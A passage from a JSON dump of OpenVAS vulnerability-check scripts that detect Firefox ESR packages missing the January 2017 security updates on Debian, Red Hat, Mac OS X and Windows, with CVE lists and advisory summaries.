isdpkgvuln(pkg:\"iceweasel-l10n-eu\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-fa\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-ff\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-fi\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-fr\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-fy-nl\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-ga-ie\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-gd\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-gl\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-gn\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-gu-in\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-he\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-hi-in\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-hr\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-hsb\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-hu\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-hy-am\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-id\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-is\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-it\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-ja\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-kk\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-km\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-kn\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-ko\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-lij\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-lt\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-lv\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-mai\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-mk\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-ml\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-mr\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-ms\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-nb-no\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-nl\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-nn-no\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-or\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-pa-in\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-pl\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-pt-br\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-pt-pt\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-rm\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-ro\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-ru\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-si\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-sk\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-sl\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-son\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-sq\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-sr\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-sv-se\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-ta\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-te\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-th\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-tr\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-uk\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-uz\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-vi\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-xh\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-zh-cn\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-zh-tw\", ver:\"45.7.0esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-19T22:05:47", "bulletinFamily": "scanner", "description": "This host is installed with Mozilla Firefox\n ESR and is prone to multiple vulnerabilities.", "modified": "2019-07-17T00:00:00", "published": "2017-01-27T00:00:00", "id": "OPENVAS:1361412562310809878", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809878", "title": "Mozilla Firefox ESR Security Updates(mfsa_2017-01_2017-02)-MAC OS X", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mozilla Firefox ESR Security Updates(mfsa_2017-01_2017-02)-MAC OS X\n#\n# Authors:\n# kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:mozilla:firefox_esr\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809878\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2017-5375\", \"CVE-2017-5376\", \"CVE-2017-5378\", \"CVE-2017-5380\",\n\t\t\"CVE-2017-5390\", \"CVE-2017-5396\", \"CVE-2017-5383\", \"CVE-2017-5386\",\n\t\t\"CVE-2017-5373\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-01-27 12:11:29 +0530 (Fri, 27 Jan 2017)\");\n script_name(\"Mozilla Firefox ESR Security Updates(mfsa_2017-01_2017-02)-MAC OS X\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Mozilla Firefox\n ESR and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exists due to,\n\n - The excessive JIT code allocation allows bypass of ASLR and DEP.\n\n - An use-after-free in XSL.\n\n - The pointer and frame data leakage of Javascript objects.\n\n - The potential use-after-free during DOM manipulations.\n\n - An insecure communication methods in Developer Tools JSON viewer.\n\n - The Use-after-free with Media Decoder.\n\n - A location bar spoofing with unicode characters.\n\n - The webExtensions can use data: protocol to affect other extensions.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this vulnerability\n will allow remote attackers to execute arbitrary code, to delete arbitrary files\n by leveraging certain local file execution, to obtain sensitive information,\n and to cause a denial of service.\");\n\n script_tag(name:\"affected\", value:\"Mozilla Firefox Esr version before\n 45.7 on MAC OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Mozilla Firefox ESR version 45.7\n or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2017-02\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_mozilla_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Mozilla/Firefox-ESR/MacOSX/Version\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!ffVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:ffVer, test_version:\"45.7\"))\n{\n report = report_fixed_ver(installed_version:ffVer, fixed_version:\"45.7\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:09", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2017-01-26T00:00:00", "id": "OPENVAS:1361412562310871753", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871753", "title": "RedHat Update for firefox RHSA-2017:0190-01", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for firefox RHSA-2017:0190-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871753\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-01-26 05:43:22 +0100 (Thu, 26 Jan 2017)\");\n script_cve_id(\"CVE-2017-5373\", \"CVE-2017-5375\", \"CVE-2017-5376\", \"CVE-2017-5378\",\n \"CVE-2017-5380\", \"CVE-2017-5383\", \"CVE-2017-5386\", \"CVE-2017-5390\",\n \"CVE-2017-5396\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for firefox RHSA-2017:0190-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'firefox'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Mozilla Firefox is an open source web browser.\n\nThis update upgrades Firefox to version 45.7.0 ESR.\n\nSecurity Fix(es):\n\n * Multiple flaws were found in the processing of malformed web content. A\nweb page containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user running\nFirefox. (CVE-2017-5373, CVE-2017-5375, CVE-2017-5376, CVE-2017-5378,\nCVE-2017-5380, CVE-2017-5383, CVE-2017-5386, CVE-2017-5390, CVE-2017-5396)\n\nRed Hat would like to thank the Mozilla project for reporting these issues.\nUpstream acknowledges Jann Horn, Muneaki Nishimura, Nils, Armin Razmjou,\nChristian Holler, Gary Kwong, Andre Bargull, Jan de Mooij, Tom Schuster,\nand Oriol, Rh0, Nicolas Gregoire, and Jerri Rice as the original reporters.\");\n script_tag(name:\"affected\", value:\"firefox on\n Red Hat Enterprise Linux (v. 5 server),\n Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Server (v. 7),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2017:0190-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2017-January/msg00043.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_(7|6|5)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~45.7.0~1.el7_3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-debuginfo\", rpm:\"firefox-debuginfo~45.7.0~1.el7_3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~45.7.0~1.el6_8\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-debuginfo\", rpm:\"firefox-debuginfo~45.7.0~1.el6_8\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~45.7.0~1.el5_11\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-debuginfo\", rpm:\"firefox-debuginfo~45.7.0~1.el5_11\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-19T22:08:42", "bulletinFamily": "scanner", "description": "This host is installed with Mozilla Firefox\n ESR and is prone to multiple vulnerabilities.", "modified": "2019-07-17T00:00:00", "published": "2017-01-27T00:00:00", "id": "OPENVAS:1361412562310809877", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809877", "title": "Mozilla Firefox ESR Security Updates(mfsa_2017-01_2017-02)-Windows", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mozilla Firefox ESR Security Updates(mfsa_2017-01_2017-02)-Windows\n#\n# Authors:\n# kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:mozilla:firefox_esr\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809877\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2017-5375\", \"CVE-2017-5376\", \"CVE-2017-5378\", \"CVE-2017-5380\",\n\t\t\"CVE-2017-5390\", \"CVE-2017-5396\", \"CVE-2017-5383\", \"CVE-2017-5386\",\n\t\t\"CVE-2017-5373\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-01-27 12:11:16 +0530 (Fri, 27 Jan 2017)\");\n script_name(\"Mozilla Firefox ESR Security Updates(mfsa_2017-01_2017-02)-Windows\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Mozilla Firefox\n ESR and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exists due to,\n\n - The excessive JIT code allocation allows bypass of ASLR and DEP.\n\n - An use-after-free in XSL.\n\n - The pointer and frame data leakage of Javascript objects.\n\n - The potential use-after-free during DOM manipulations.\n\n - An insecure communication methods in Developer Tools JSON viewer.\n\n - An use-after-free with Media Decoder.\n\n - A location bar spoofing with unicode characters.\n\n - The webExtensions can use data: protocol to affect other extensions.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this vulnerability\n will allow remote attackers to execute arbitrary code, to delete arbitrary files\n by leveraging certain local file execution, to obtain sensitive information,\n and to cause a denial of service.\");\n\n script_tag(name:\"affected\", value:\"Mozilla Firefox ESR version before\n 45.7 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Mozilla Firefox ESR version 45.7\n or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2017-02/\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_firefox_detect_portable_win.nasl\");\n script_mandatory_keys(\"Firefox-ESR/Win/Ver\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!ffVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:ffVer, test_version:\"45.7\"))\n{\n report = report_fixed_ver(installed_version:ffVer, fixed_version:\"45.7\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-24T12:57:50", "bulletinFamily": "scanner", "description": "Multiple security issues have been found\nin the Mozilla Firefox web browser: Memory safety errors, use-after-frees and other\nimplementation errors may lead to the execution of arbitrary code, information\ndisclosure or privilege escalation.", "modified": "2017-07-07T00:00:00", "published": "2017-01-25T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=703771", "id": "OPENVAS:703771", "title": "Debian Security Advisory DSA 3771-1 (firefox-esr - security update)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3771.nasl 6607 2017-07-07 12:04:25Z cfischer $\n# Auto-generated from advisory DSA 3771-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703771);\n script_version(\"$Revision: 6607 $\");\n script_cve_id(\"CVE-2017-5373\", \"CVE-2017-5375\", \"CVE-2017-5376\", \"CVE-2017-5378\",\n \"CVE-2017-5380\", \"CVE-2017-5383\", \"CVE-2017-5386\", \"CVE-2017-5390\",\n \"CVE-2017-5396\");\n script_name(\"Debian Security Advisory DSA 3771-1 (firefox-esr - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:04:25 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2017-01-25 00:00:00 +0100 (Wed, 25 Jan 2017)\");\n script_tag(name: \"cvss_base\", value: \"10.0\");\n script_tag(name: \"cvss_base_vector\", value: \"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2017/dsa-3771.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"firefox-esr on Debian Linux\");\n script_tag(name: \"insight\", value: \"Firefox ESR is a powerful, extensible\nweb browser with support for modern web application technologies.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (jessie),\nthese problems have been fixed in version 45.7.0esr-1~deb8u1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 45.7.0esr-1 of firefox-esr and version 51.0-1 of firefox.\n\nWe recommend that you upgrade your firefox-esr packages.\");\n script_tag(name: \"summary\", value: \"Multiple security issues have been found\nin the Mozilla Firefox web browser: Memory safety errors, use-after-frees and other\nimplementation errors may lead to the execution of arbitrary code, information\ndisclosure or privilege escalation.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"firefox-esr\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-dbg\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-dev\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-ach\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-af\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-all\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-an\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-ar\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-as\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = 